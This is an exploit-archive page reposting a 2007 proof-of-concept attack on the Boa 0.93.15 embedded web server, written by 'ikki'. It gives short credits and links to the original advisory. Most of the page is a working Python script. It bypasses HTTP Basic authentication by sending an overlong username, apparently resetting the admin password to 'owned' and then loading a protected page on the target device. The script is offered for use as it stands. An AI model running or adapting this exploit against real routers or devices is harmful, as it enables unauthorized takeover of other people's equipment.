Boa 0.93.15 HTTP Basic Authentication Bypass Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Boa 0.93.15 HTTP Basic Authentication Bypass Exploit
# Published : 2007-10-16
# Author : ikki
# Previous Title : Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
# Next Title : Quicktime Player 7.3.1.70 rtsp Remote Buffer Overflow Exploit PoC

/*
 * Boa HTTP Basic Authentication Bypass 
 * Vuln: Boa/0.93.15 (with Intersil Extensions)
 *
 * Original Advisory: 
 * http://www.securityfocus.com/archive/1/479434
 * http://www.ikkisoft.com/stuff/SN-2007-02.txt
 *
 *  Luca "ikki" Carettoni
 *  http://www.ikkisoft.com
 */

----

#!/usr/bin/env python
import urllib2

SERVER_IP_ADDRESS = '192.168.0.1'
USERNAME 
= 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
NEW_PASSWORD = 'owned'

auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password('LOGIN(default username & password is admin)', 
SERVER_IP_ADDRESS, USERNAME, NEW_PASSWORD);
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
res = urllib2.urlopen('http://'+SERVER_IP_ADDRESS+'/home/index.shtml')

# www.Syue.com [2007-10-16]